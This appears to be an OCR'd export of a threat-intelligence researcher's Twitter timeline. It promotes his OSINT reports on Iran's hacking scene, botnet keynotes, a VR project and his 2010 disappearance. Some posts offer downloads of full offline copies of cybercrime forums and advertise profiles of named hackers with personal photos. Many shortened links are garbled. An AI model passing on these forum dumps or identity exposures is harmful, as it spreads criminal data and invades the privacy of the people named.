New Post on https://t.co/X2z28aSWFfB - "Announcing https://t.co/X2z28aSWfB’s World 
Hacker Global Domination Group (WHGDG) Call for Security and Privacy Papers and 
Call for Innovation" - https://t.co/BfsEwOlOLn #security #cybercrime #malware
10 - Friday


12:05 


Bookmark this today - https://t.co/eCPsGygJuG and stay tuned for upcoming 
high-profile Talk-Show on Security and Privacy hosted at https://t.co/X2z28aSWFfB. 
New blog here - https://t.co/2PlcoLkWd8 #security #cybercrime #malware 


27 - Monday 


06:27 
New Report - "A Qualitative and Technical Collection OSINT-Enriched Analysis of the 
Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital Security 
Team" - https://t.co/thOxX1WVsb #security #cybercrime #malware 
31 - Friday 


07:46 


Just joined Peerlyst - https://t.co/CYsLxqbKbb say "hi" by reading my first post. Stay 
tuned! #security #cybercrime #malware 


February 


11 - Tuesday 


13:16 
https://t.co/8rMfdfVdXP #security #cybercrime #malware #cybersec #cyberthreat 
#threatintelligence #Threatintel #hacker #hackers #hacking 


12 - Wednesday 


08:44 


https://t.co/yJKJbcsoJ4 #security #cybercrime #malware #cybersecurity #cybersec 
#cyberthreat #hacker #hackers #hacking 


16 - Sunday 


02:53 


New Post - "Exploring the “Let’s Name and Shame Them” Intelligence Community 
Mentality - Keep it coming?" - https://t.co/AsvBvgR7sF #security #cybercrime 
#malware #cybersecurity #cybersec #Threatintel 


21 *1 
03:50 
New Post - "The Top 10 Off-The-Shelf Cyber Threat Intelligence Career Positions - And
Which One You Should Pick Up?" - https://t.co/SZNSZk4ZSO #security #cybercrime
#malware #cybersecurity #cybersec #Threatintelligence #Threatintel
*%2
09:29 


Grab a copy today! - "A Qualitative and Technical Collection OSINT-Enriched Analysis 
of the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital 
Security Team" - https://t.co/VZxHGop83x #security #cybercrime #malware 
#cybersecurity 


18 - Tuesday 


07:07 


Check this out - https://t.co/BKKLYQSBQB - The World’s Leading Cyber Threat 
Intelligence Products Portal! Inquire about your Cyber Threat Intelligence needs 
today! 
15333 


New Post - Dancho Danchev’s Disappearance - 2010 - Official Complaint Against 
Republic of Bulgaria - https://t.co/4kSkLVCIgA #security #cybercrime #malware 
#CyberSecurity #CyberSec 


*1 


19 - Wednesday 


06:37 


Grab a copy of 2015’s Edition of "Exposing Ashiyane Digital Security Team - Report"
today! - the single most comprehensive analysis of Iran’s Hacking Scene -
https://t.co/uzDPPRvtlIH #security #cybercrime #malware #CyberSecurity
#Threatintel #ThreatHunting


*1 


24 - Monday 


03:21 


New Portfolio of Cybercrime Forum Data Sets for 2020 just added at 
https://t.co/BKKLYQSBQB #security #cybercrime #malware #CyberSec 
#cybersecurity #Threatintel 


*%2 
03:26 


Grab an account today! - https://t.co/WIBGTU5ryT #security #cybercrime #malware 
#CyberSec #cybersecurity #Threatintel 


*1 


26 - Wednesday 


07:58 


Grab a copy of my 2020’s report on Iran’s Hacking Scene - https://t.co/VZxHGop83x 
including 2015’s edition - https://t.co/uzDPPRvtlH and help me fuel growth into my 
research! #security #cybercrime #malware #CyberSecurity #ThreatHunting 
#Threatintel 


March 


5 - Thursday 


06:00 


New Cybercrime Forum Data Sets Portfolio update! - https://t.co/8KKLYRacl9 
#security #cybercrime #malware #CyberSecurity #Threatintelligence 
#ThreatHunting 


7 - Saturday 


10:28 


New Post - "Enter a Bold New World of Hacking and Security - Embrace the 
Cybertronics VR Platform for Hackers and Security Experts Today! We’re Hiring!" - 
https://t.co/feDN56d2is #security #cybercrime #malware 


21 *%1 


11 - Wednesday 


09:06 


RSVP Today! - https://t.co/J[97DNeN2nY #security #cybercrime #malware 
#CyberAttack #cybersecurity #CyberSec #Threatintel #threatintelligence 


17 - Tuesday 


04:42 


Dare to spend a moment of your precious time? Check this out - 
https://t.co/Yqv3V8COOd and join us today! #security #cybercrime #malware 
#CyberAttack #cybercrime #CyberSecurity #Threatintel 


24 - Tuesday 


10:01 
Re-claiming dominance over the communication channel - in progress! Check this
out - https://t.co/fnswrm8KWP re-share pls! #security #cybercrime #malware 
#CyberSecurity #CyberAttack 
10:08 


Check this out - https://t.co/fnswrm8KWP in particular the Greets and Shouts section! 
cc: @gadievron @alexeck @stevesantorelli @Treadstone71LLC @jeffreycarr 
@HostExploit @bobmcmillan @roblemos @jorgemieres @MarcusSachs @gollmann 
cheers! stay tuned! 

10:17 


Check this out - https://t.co/fnswrm8KWP in particular the Greets and Shouts section! 
cc: @anthonyaykut @kevtownsend @dwreski @cryptome_org @ericgoldman 
@johullrich cheers! stay tuned! 


26 - Thursday 


09:18 


Missing Koobface? Check out my Keynote on Tracking down and Taking Down the 
Koobface botnet circa 2016 - https://t.co/q5iTxLwmK1 #security #cybercrime 
#malware #CyberAttack #CyberSecurity #cyberthreats #Threatintel 
#Threatintelligence #ThreatHunting 


25 *1 


April 


2 - Thursday 


08:06 


Finally! I’ve found a VR application developer for the Cybertronics - VR for Hackers 
and Security Experts platform - https://t.co/feDN56d2is Got Bitcoin? Can you make a
modest donation to support the project? Approach me at dancho.danchev@hush.com 


*1 
09:45 
Anyone interested in inviting me to speak at their event? Approach me at 
dancho.danchev@hush.com https://t.co/ifz5hlv3pA 
09:46 
Takes you back - doesn’t it? Stay tuned! https://t.co/sYHup|Xrd7 
09:46 


Quite a novel approach to say "hi". Keep it coming! Stay tuned! 
https://t.co/XEO3UZj9w8s 
*1
09:58 


Team @Webroot long time no hear. Now I’m officially back - https://t.co/cjIBXsIP49 I
wanted to say big thanks for bringing me on board circa 2012-2014. It was a pleasure
and an honor to work with you. Check this out - https://t.co/xLcu3tz4iF Keep in touch!
https://t.co/DiJkBCn1Yz


10:01 


Hello! Pleasure and an honor to come across this Tweet. Much appreciated for the
actual award. Catch up with some of my research here - https://t.co/wEK5XX2J9Z and 
keep it coming! Stay tuned! https://t.co/vqghROegneh 


*1 
13:05 


@goretsky This is pretty interesting. In times of war these are usually among the few
"touch points" with another country’s leadership that shouldn’t be bothered. And
since when achieving a "media echo" effect constitute espionage? Appreciate my
rhetoric.


*1 
13:10 
@Reuters @josephmenn @WHO @jc_stubbs @razhael @Bing_Chris Check out my 
state of the art work on Iran’s Hacking Scene - https://t.co/8BKKLYQSBQB 
13:14 


@stevewerby @jack_daniel @thedarktangent @todayininfosec @hackerfantastic 
@neilhimself Guys - check this out - https://t.co/fnswrlR9yf and 
https://t.co/2P1coL3kOy cheers! 


3 - Friday 
08:49 
@evacide Check this out - https://t.co/8BKKLYQSBQB 
08:59 
@Malwarelnt Check this out - https://t.co/8BKKLYQSBQB 

09:00 

@Treadstone71LLC Check this out - https://t.co/8KKLYQSBQB 
09:01 

@RecordedFuture Check this out - https://t.co/8BKKLYQSBQB 
09:03 


@chillum Check this out - https://t.co/8BKKLYQSBQB 
09:04
@memricjl Check this out - https://t.co/BKKLYQSBQB 


09:06 
@ThreatConnect @TheJusticeDept Check this out - https://t.co/BKKLYQSBQB 


7 - Tuesday 


12:00 


Are you staying at home? I’m currently offering a Coupon Code for my Iran Hacking 
Scene research report analysis worth $100 which you can claim by visiting -
https://t.co/kjhbWF2a38 and https://t.co/DaJj/KRQTel the actual code - Y3FJPT8R Stay 
tuned! 


27 - Monday 


07:32 


Check this out! - https://t.co/ETFyOUGTA2 we’re proud to announce the general 
availability of https://t.co/X2Z28aSWFfB’s flagship Hacking and Security search engine! 
Over 2,223,579 results and counting! Check out the main page - 
https://t.co/fnswrm8KWP 


07:36 


We're back! Check out the recently launched https://t.co/BTUuSMsPDol flagship IRC 
Network for Hackers and Security Experts - https://t.co/Euilyy8gyZ Grab a copy of 
HexChat - https://t.co/I7DqVpdnXX and join us today! Stay tuned! 


28 - Tuesday 


08:22 


RT @Inxsec: Identifying info that could be used against an organization is critical in 
mitigating cyber risk. In a new feature article, @In... 


10:04 


https://t.co/BTUSMSPDol is back! Join us on IRC today! Register a channel for your 
group or organization today! - https://t.co/Euilyy8gyZ stay tuned! #security 
#cybercrime #malware #Threatintelligence #Threatintel 


*%2 


July 
17 - Friday 
11:47


Two High-Profile OSINT And Technical Collection Analysis Reports On Iran’s Hacking 
Scene And The Ashiyane Digital Security Team - Available For Free! - 
https://t.co/N5CJFpE9mq #security #cybercrime #malware 


21 *%1 

11:48 

The Relevance And Irrelevance Of CIA’s Vault 7 Cyber Weapons Arsenal - An In-Depth
OSINT Analysis - https://t.co/lu3IlptMBQR #security #cybercrime #malware
11:49 
Exposing Ashiyane Digital Security Team - An OSINT Analysis - 
https://t.co/9InvSK9OLSL #security #cybercrime #malware 
11:50 
Exposing Iran’s Hacking Scene And Hacking Ecosystem Major Web Site Repositories -
An OSINT Analysis - https://t.co/SlHn4gq8Lo #security #cybercrime #malware 

11:51 


Exposing Bulgaria’s Involvement In Cold War Espionage - Who Stole The PC And Build 
A Fake Pro-Western Empire? - An OSINT Analysis - https://t.co/nFClgn9Ky! #security 
#cybercrime #malware 


11:51 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cybercrime-Friendly Forum Communities - https://t.co/sS5SFL1LYIZ #security
#cybercrime #malware 


11:52 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cybercrime-Friendly Forum Communities - Part One - https://t.co/3FWjdL5cN8
#security #cybercrime #malware 


11:53 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cybercrime-Friendly Forum Communities - Part Two - https://t.co/vu33SsbxLi
#security #cybercrime #malware 


11:53 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cybercrime-Friendly Forum Communities - Part Three - https://t.co/ySOSMHJZyU
#security #cybercrime #malware 


11:54 


Exposing The Modern Cybercrime Ecosystem - A Compilation Of Currently Active 
Cybercrime-Friendly Forum Communities - Part Four - https://t.co/bzuodixT7P
#security #cybercrime #malware 
11:55


Cybercrime Forum Data Set - 2019 - Free Download! - https://t.co/9anuGuTg1V 
#security #cybercrime #malware #Threatintel #ThreatHunting #CyberSecurity 
#CyberAttack #cyberattacks #Botnet 


18 - Saturday 


09:05 


I’ve decided to make my offline cybercrime forum data set for 2019 publicly available 
with the idea to solicit your participation in my currently ongoing Law Enforcement 
and OSINT operation "Uncle George" https://t.co/9anuGuTg1V stay tuned! 

09:13 


Quick Q: "What do you do for a living? A: I do OSINT cybercrime research threat
intelligence gathering and I’m an aspiring "4th party collector" supporting U.S Law
Enforcement and the U.S Intelligence Community with state of the art cyber threat
research.


*1 
10:09 


https://t.co/fnswrm8KWP - RT pls! 


20 - Monday 


03:57 


Missing Koobface? Watch my Keynote at CyberCamp 2016 here - 
https://t.co/UTo6t4uACd and check out the actual PPT here - https://t.co/oo5hjgR3qE 
stay tuned! #security #cybercrime #malware https://t.co/FTCvyFY6DP 
22 - Wednesday


00:57 


Anyone using Jabber/OMEMO? Here’s mine - ddanchev@xmpp.jp can you please hook 
with me now so that we can catch up? Cheers! Dancho 


*%2 
11:42 


This is me circa 2010 in Sofia, Bulgaria meeting with @rivarichmond to discuss the 
Koobface botnet. Guess who took the shot? God bless and let’s don’t forget about 
the rest! Keep it coming! Stay tuned! Cheers! Dancho. https://t.co/wt4zcALaZC 
26 - Sunday


05:51 
Anyone interested in having me speak at their event? #security #cybercrime 
#malware 
*1 
27 - Monday 
03:43 


Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of 
Bulgaria - https://t.co/4kSkLVCIgA #security #cybercrime #malware 


28 - Tuesday 


10:07 


Dear guys, do you remember me? I’ve decided to take this shot and say "hi" and "I’m 
back" to the security industry. Catch up with what I’ve been up to at 
https://t.co/JTcqOaYgET and https://t.co/fnswrm8KWP and stay tuned! RT pls and say 
"hi". Cheers! Dancho. https://t.co/e9cML4p862 
*%2


23:11 


@IcOdeWs Hi @IlcOdeWs thanks for the reply. Feel free to ping me in case you need
any sort of research assistance or actual research advice and guidance and I'd be 
happy to help. Keep up the good work. Cheers! Dancho. 


*1 
23:13 
@XephyChan Hello. Can you post it here? You can also send a message to 
dancho.danchev@hush.com cheers! Dancho. 
23:15 


@OxOOOFED Hello. Can you post here? You can send a message at 
dancho.danchev@hush.com cheers! Dancho. 
29 - Wednesday


05:19 


Dear @ThreatConnect - thanks a lot for featuring my personal https://t.co/JTcqOaYgET 
here - https://t.co/IKnLAFoWEO pleasure and an honor to work with you and to touch 
base with you! Cheers! Dancho. 


*1 


August 


14 - Friday 


08:44 
Thanks! Stay tuned! Dancho. https://t.co/5Kg3jDaZGp 


24 - Monday 


03:44 

Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of
Bulgaria - https://t.co/4kSkLVCIgA
03:44 
Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two - 
https://t.co/xGvnXPIOhj 

03:47 

Check this out! - Dancho Danchev’s Blog - Official Offline Multiple E-book Formats
Direct Download Available for Free! - https://t.co/Ot8BkZEgbG -
https://t.co/61hCUjQIisX #security #cybercrime #malware
04:09 
Cybercrime Forum Data Set - 2019 - Free Download! - https://t.co/9anuGuTg1V
#security #cybercrime #malware #ThreatHunting #Threatintelligence #Threatintel
08:41 


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cybercrime-Friendly Forum Communities - https://t.co/sS5SF1LYIZ #security
#cybercrime #malware 


08:42 


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cybercrime-Friendly Forum Communities - Part One - https://t.co/3FWjdL5cN8
#security #cybercrime #malware 
08:42


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cybercrime-Friendly Forum Communities - Part Two - https://t.co/vu33SsbxLi
#security #cybercrime #malware 


08:43 


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cybercrime-Friendly Forum Communities - Part Three - https://t.co/ySOSMHJZyU
#security #cybercrime #malware 


08:43 


Exposing the Modern Cybercrime Ecosystem - A Compilation of Currently Active 
Cybercrime-Friendly Forum Communities - Part Four - https://t.co/bzuodixT7P
#security #cybercrime #malware 


28 - Friday 


07:19 


Check this out! Dancho Danchev’s Blog - Official Offline Multiple E-book Format 
Compilation Direct Download! - https://t.co/5ZZnaFLNpY #security #cybercrime 
#malware #CyberSecurity #CyberAttack #cyberattacks #Threatintel 
#Threatintelligence 


07:20 


Check this out! Official Cybercrime Forum Data Set for 2019 Direct Download! - 
https://t.co/ToOEwv6F58A #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #Threatintel #Threatintelligence 


07:44 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/isbA29DVfj - https://t.co/7Tad6ODaOx Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 


07:45 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - gerki.pw- https://t.co/E4FmL63g1R Join Operation "Uncle George" Today! - 
https://t.co/PRzdRWdpPe 


07:46 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - ProLogic - https://t.co/xne7nN6XIT Join Operation "Uncle George" Today! - 
https://t.co/PRzdRWdpPe 


07:46 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - SEOForum - https://t.co/kKGBRXU9q24 Join Operation "Uncle George" 
Today! - https://t.co/PRzdRWdpPe 
07:47


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/2fdeO7myr2 - https://t.co/ng2x32RDxp Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 

07:47 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/KbahacYnmg - https://t.co/FvQtBiINDf Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 
07:48 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/1llwm7j7aSH - https://t.co/SINQKsAzq] Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 
07:48 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/BUdEUr0IQO - https://t.co/AxVhTk6t50 Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 

07:49 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/vCejx13NC] - https://t.co/9zUfardUjt Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 
07:50 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/lI930aleQko - https://t.co/jdx2 7AMNzj Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 
07:50 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - PhreakerPro - https://t.co/FKdUnsKrAa Join Operation "Uncle George" 
Today! - https://t.co/PRzdRWdpPe 
07:50 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - Master-X - https://t.co/z7IdtX3CWL Join Operation "Uncle George" Today! - 
https://t.co/PRzdRWdpPe 


07:51 


Check this out! Cybercrime-Friendly Forum Community - Full Offline Copy - Direct 
Download - https://t.co/3cJ2u6zDrl - https://t.co/O3RpD4XYiZ Join Operation "Uncle 
George" Today! - https://t.co/PRzdRWdpPe 


07:55 
Here are some sample findings - https://t.co/Ni39ctkT1d from a current participant in
my currently ongoing OSINT and Law Enforcement Operation called "Uncle George".
Dare to join me? Drop me an email at dancho.danchev@hush.com Stay tuned!
07:59 


New Post - Announcing Law Enforcement and OSINT Intelligence Operation "Uncle 
George" - Join Me Today! - Part Three - https://t.co/GfEGqVlpyj #security #cybercrime 
#malware 


07:59 


New Post - Profiling a Currently Active Portfolio of High-Profile Cybercriminal Jabber 
and XMPP Accounts Including Email Address Accounts - Part Two - 
https://t.co/DBynRtsT0e #security #cybercrime #malware 


10:37 


Folks - catch up in terms of what I’ve been up to in terms of research on Medium - 
https://t.co/GtWdP1FvOc #security #cybercrime #malware #CyberSecurity 
#CyberSec #CybersecurityNews #Threatintelligence #Threatintel 


31 - Monday 


00:13 


Folks! Grab a direct download copy of my Iran CNO Study circa 2015 from here - 
https://t.co/R2YnpeTX7o including my second Technical Collection Iran Hacking 
Ecosystem study from here - https://t.co/K6UATSRIC9 Stay tuned! 
https://t.co/YSSNIPJJKr 
[Image: promotional flyer - "Dancho Danchev Presents! Brace Yourselves!" - for the Exposing Iran's Hacking Scene OSINT report. Official OSINT Report Price - $500. https://ddanchev.blogspot.com - Email: dancho.danchev@hush.com]

00:16 
You can also check some of the findings from the Technical Collection research and
analysis here - https://t.co/SlLHn4gq8Lo including to actually go through my FBI Most
Wanted - OSINT Analysis checklist here - https://t.co/BrbiJAKMx2 Stay tuned!


00:23 
Have you ever wanted to take one of the security industry’s leading cybercrime and
threat intelligence gathering publication on your E-book reader? Here’s the actual
link - https://t.co/JT676NfPZI including a direct download copy -
https://t.co/5ZZnaFLNpy https://t.co/XMMVPjZ4kS


*1 
[Image: e-book cover - "Dancho Danchev's Personal Security Hacking and Cybercrime Research Memoir"]


September 


1 - Tuesday 


09:24 


New Post - Cyber Security Project Investment Proposal - Cybertronics - VR for Hackers 
and Security Experts - Support me Today! - https://t.co/4Hfal4R4gD #security 
#cybercrime #malware #VirtualReality 


09:42 


This is where the magic happens since December, 2005. https://t.co/JTcqOaYgET -
https://t.co/fnswrm8KWP God bless and let’s don’t forget about the rest! Stay tuned!
https://t.co/Mo0OAQADAXD


*1 


09:44 


This is me presenting at RSA Europe 2012. Here’s the actual PPT - 
https://t.co/y78Fq4aC1l CC: @RSAConference @RSAEurope #security #cybercrime 
#malware https://t.co/spjO7dQNF4 
09:46


This is me presenting at InfoSec Europe 2012 on behalf of Webroot Inc. CC @Webroot 
@WebrootEMEA #security #cybercrime #malware https://t.co/8pwJk8nyGR 
09:48


This is me presenting at CyberCamp 2016. Here’s the actual PPT - 
https://t.co/oo5hjgR3qE CC: @CybercampEs @INCIBE @incibe cert #security 
#cybercrime #malware https://t.co/yke5cTEm8c 
2 - Wednesday


07:11 
#NowPlaying - Paranea - Spheres - https://t.co/dSuZAy5wov #security #cybercrime 
#malware 
07:14 


Do you miss Koobface? Watch my Keynote at @CybercampEs circa 2016 on 
"Exposing Koobface - The World’s Largest Botnet" - https://t.co/q5iTxLwmK1 
#security #cybercrime #malware #CyberSecurity #cyberattacks #Threatintel 


07:25 


Check this out! - All the major personal Iran-based Web sites of hackers and hacking 
groups profiled and exposed - https://t.co/SLHn4gq8Lo personal photos included! 
Stay tuned! CC: @Treadstone71LLC #security #cybercrime #malware 


07:28 


Check this out! - Iran’s flagship Hacking and Security Ashiyane Digital Security Team 
profiled and exposed - https://t.co/9InvSK9LSL personal photos included! Stay tuned! 
CC: @Treadstone71LLC #security #cybercrime #malware 
07:30


Check this out! - "Assessing The Computer Network Operation (CNO) Capabilities of
the Islamic Republic of Iran - Report" - Grab a copy today! - https://t.co/R2YnpeTX7o
CC: @Treadstone71LLC #security #cybercrime #malware


07:31


Check this out! - "A Qualitative and Technical Collection OSINT-Enriched Analysis of
the Iranian Hacking Scene Through the Prism of the Infamous Ashiyane Digital
Security Team" - Grab a copy today! https://t.co/xK6UATSRIC9 CC: @Treadstone71LLC


07:34


This is the most comprehensive and publicly accessible @MaltegoHQ graph of Iran’s
Hacking Ecosystem ever produced courtesy of me. Grab a full copy of the report
today! - https://t.co/R2YnpeTX7o Stay tuned! CC: @Treadstone71LLC #security
#cybercrime #malware https://t.co/mG4VANpnDp
07:36


Check this out - "Exposing Iran’s Most Wanted Cybercriminals - FBI Most Wanted 
Checklist - OSINT Analysis" - https://t.co/BrbiUAKMx2 Stay tuned! CC: 
@Treadstone71LLC @FBIMostWanted #security #cybercrime #malware 
https://t.co/E8djkjgqfU 
07:59


Can anyone from #Russia confirm that they’re seeing a LumenDatabase message 
when they search for my name? Here’s the actual message - 
https://t.co/NaluwhxwOh #security #cybercrime #malware https://t.co/8hDCBMelIRX 


This is a removal request under Russian Federal Law 276-FZ dated July 29, 2017. 
We are unable to publish the requested URLS. 


08:09 


Missing Dark Avenger, Durzhavna Sigurnost, Varna Hacking Group and Phreedom 
Group Bulgaria circa the 90’s? Check this OSINT Analysis - https://t.co/nFClgn9Kyl 
courtesy of me. Check out the actual Durzhavna Sigurnost archive - 
https://t.co/O7Brvyzblo 
08:12


Underground Forum Chatter on my disappearance - https://t.co/4kKSkKLVCIgA - 
https://t.co/xGvnXPIOhj circa 2010. Courtesy of @briankrebs Stay tuned! #security 
#cybercrime #malware https://t.co/DK2000CrcU 


08:13 


Underground Forum Chatter on my disappearance - https://t.co/4kKSkKLVCIgA - 
https://t.co/xGvnXPIOhj circa 2010. Courtesy of @XylitOl Stay tuned! #security 
#cybercrime #malware https://t.co/RWMOoxvOQC 




08:15 


Underground Forum Chatter on my disappearance https://t.co/4kSkLVCIgA - 
https://t.co/xGvnXPIOhj circa 2010. Courtesy of @XylitOl. Stay tuned! #security 
#cybercrime #malware https://t.co/q4CYfl1L26 
08:16


Underground Forum Chatter on my disappearance - https://t.co/4kKSkKLVCIgA - 
https://t.co/xGvnXPlOhj circa 2010. Courtesy of @XylitOl. Stay tuned! #security 
#cybercrime #malware https://t.co/nVvSy83QNm 
R.I.P Dancho Danchev?


08:17 


Underground Forum Chatter on my disappearance - https://t.co/4kSKLVCIgA - 
https://t.co/xGvnXPIlOhj circa 2010. Courtesy of @Xylit0l. CC: @abuse_ch Stay tuned! 
#security #cybercrime #malware https://t.co/vVKA8930Dyi 


21 *3 
08:35


The CIA doing "lawful surveillance"? Who would have thought? Check out my - "The 
Relevance and Irrelevance of CIA’s Vault 7 Cyber Weapons Arsenal - An In-depth 
OSINT Analysis" https://t.co/lu3IptMBQR including the C&C server IPs including
the associated MD5s. 


08:40 


Check this out! - "Exposing High Tech Brazil Hack Team Mass Web Site Defacement 
Group - An OSINT Analysis" - https://t.co/GRKPb3cAiv #security #cybercrime 
#malware 


22 *1 
08:58 


Check this out - "Assessing the Recently Leaked FSB Contractor Data - A Peek Inside
Russia’s Understanding of Social Network Analysis and Tailored Access Operations" -
https://t.co/ldM8PDliy2 #security #cybercrime #malware


09:02 


Check this out - "Profiling "Innovative Marketing" - The Flagship Malvertising and 
Scareware Distributor - Circa 2008 - An OSINT Analysis" - https://t.co/H7hY7kTEhI 
#security #cybercrime #malware 


*1 
09:03 


Check this out - "Exposing Evgeniy Mikhaylovich Bogachev and the "Jabber ZeuS" 
Gang - An OSINT Analysis" - https://t.co/ewBaYgusMN #security #cybercrime 
#malware 


*1 
09:04 


Check this out - "Who's Behind the Syrian Electronic Army? - An OSINT Analysis" - 
https://t.co/Cid61EZfCw #security #cybercrime #malware 


*1 
09:07 


Check this out - "Exposing Bulgaria’s Largest Data Leak - An OSINT Analysis" - 
https://t.co/t49cZdingz #security #cybercrime #malware 
09:08 


Check this out - "Exposing Yet Another Currently Active Fraudulent and Malicious 
Pro-Hamas Online Infrastructure" - https://t.co/ipNlgAWszr #security #cybercrime 
#malware 


09:10 


Check this out - "Historical OSINT - A Portfolio of Fake Tech Support Scam Domains - 
An Analysis" - https://t.co/oVSJhQaOyh #security #cybercrime #malware 


1 
09:11 
Check this out - "Who's Behind BakaSoftware? - OSINT Analysis" - 
https://t.co/yCfYp9r4VK #security #cybercrime #malware 
4 - Friday 
05:01 


#NowPlaying - Jamie Woon - Lady Luck (Mad Morello & Igi Remix) -
https://t.co/BHFWs7kaVr
5 - Saturday


04:21 


This is me presenting at @CybercampEs on "Exposing Koobface - The World’s Largest 
Botnet". Here’s the actual PPT - https://t.co/oo5hjgR3qgE Watch the actual Keynote 
here - https://t.co/q5iTxLwmK1 Stay tuned! #security #cybercrime #malware 
https://t.co/OE7d9Lmpef 


05:06 


This is me presenting at InfoSec Europe circa 2012 with @Webroot. Here’s a full
summary of all of my posts at Webroot’s Threat Blog circa 2012-2014 -
https://t.co/xLcu3tz4iF Stay tuned! #security #cybercrime #malware
https://t.co/blIOWjJRizB
05:11


Here’s my "Exposing the Dynamic Money Mule Recruitment Ecosystem" PPT from an 
invite-only conference - https://t.co/2cCjClx5aH Enjoy! #security #cybercrime 
#malware 


05:13 


Here’s my "Intell on the Criminal Underground - Who's Who in Cyber Crime for 
2007?" PPT - https://t.co/FMihIBNPU2 Enjoy! #security #cybercrime #malware 


22 
06:07 


Here’s my "Cyber Jihad vs Cyberterrorism - Separating Hype from Reality" PPT from 
RSA Europe 2012 - https://t.co/y78Fq4aC11 Enjoy! #security #cybercrime #malware 


7 - Monday 


08:11 


Watch my @CybercampEs Keynote on Koobface circa 2016 - here - 
https://t.co/q5iTxLwmkK1 PPT here - https://t.co/oo5hjgR3qE #security #cybercrime 
#malware #CyberSecurity #cyberattacks #CyberAttack #Threatintel 
#ThreatHunting #threatintelligence 
22
08:24 


Check this out! Dancho Danchev’s official "We Hate You" album on vinyl courtesy of
"Deterrent Industries" - https://t.co/nwEjEXcvgt Who’s behind the album? Check out
the OSINT analysis here - https://t.co/xGvnXPIOhj #security #cybercrime #malware
https://t.co/742rApneWa


[Image: album cover text - "DANCHO DANCHEV SUCK MY DICK"]


08:28 


Listen to the original interview - https://t.co/1YtU5DVpsM [MP3] which I gave to DW
circa 2012 on the Koobface botnet. Here’s the actual interview - 
https://t.co/9C2AfIKrVE Stay tuned! #security #cybercrime #malware 


9 - Wednesday 


05:44 


#NowPlaying - Mr. Suspect & Hi Profile - Learn To Listen (Original Mix) -
https://t.co/uaThk8IXYn
14 - Monday


03:45 


New Post - Dancho Danchev’s Blog - Official Multiple E-Book Formats Full Offline 
Download Copy Available - Grab a Copy Today! - https://t.co/FsmgThl1lgh #security 
#cybercrime #malware #CyberSecurity #cyberthreats #Threatintel 
#Threatintelligence 


03:46 


New Post - Profiling a Currently Active High-Profile Cybercriminals Portfolio of 
Ransomware-Themed Extortion Email Addresses - https://t.co/xbr9BSxfHV #security 
#cybercrime #malware #CyberSecurity #cyberthreats #Threatintel 
#Threatintelligence 


26 - Saturday 


02:12 


Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of 
Bulgaria - https://t.co/4kSkLVCIgA #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CyberSec #Threatintel #Threatintelligence 


22 *1 
02:13 


Dancho Danchev’s 2010 Disappearance - An Elaboration - Part Two - 
https://t.co/xGvnXPIOhj #security #cybercrime #malware #CyberSecurity 
#CyberAttack #CyberSec #Threatintel #Threatintelligence 


22 *%2 


28 - Monday 


04:01 


Check this out! We're officially back! I’ve recently launched a high-profile project on 
the original https://t.co/fnswrm8KWP and guess what? As of today we have a fully 
working flagship search engine for hackers and security experts working. Enjoy! RT 


pls! 
21 
04:04 


Interested in receiving high-profile security news and research articles? Subscribe to 
our https://t.co/BTusMsPDol Official Security Newsletter - https://t.co/mITgfrpPEX 
#security #cybercrime #malware #CyberSecurity 

04:05 
Grab an account at our https://t.co/BTusMsPDol Official Security and Hacking Forum 
here - https://t.co/FwBdikRI1fF #security #cybercrime #malware #CyberSecurity 
04:06 


Check out our official https://t.co/BTusMsPDol Wordpress blog here - 
https://t.co/YKvIULGwPu #security #cybercrime #Malware #CyberSecurity Stay 
tuned! 


*1 
04:11 


Have you heard of my Virtual Reality for Hackers Cybertronics project? Check out the 
technical specifications here - https://t.co/DJt4KUZzJd and donate today! #security 
#cybercrime #malware #CyberSecurity Stay tuned! 


October 


2 - Friday 


04:09 


Join me on Facebook for a Live Broadcast in two hours! - https://t.co/6bLLdzOCpC 
#security #cybercrime #malware #CybersecurityAwarenessMonth #CyberSecMonth 
#CyberSecurityMonth #ThreatHunting #Threatintel #Threatintelligence Cheers! 
Dancho. 


05:29 


Going live in 30 minutes! - https://t.co/6bLLdzOCpC #security #cybercrime 
#malware #CybersecurityAwarenessMonth #CyberSecMonth #CyberAttack 
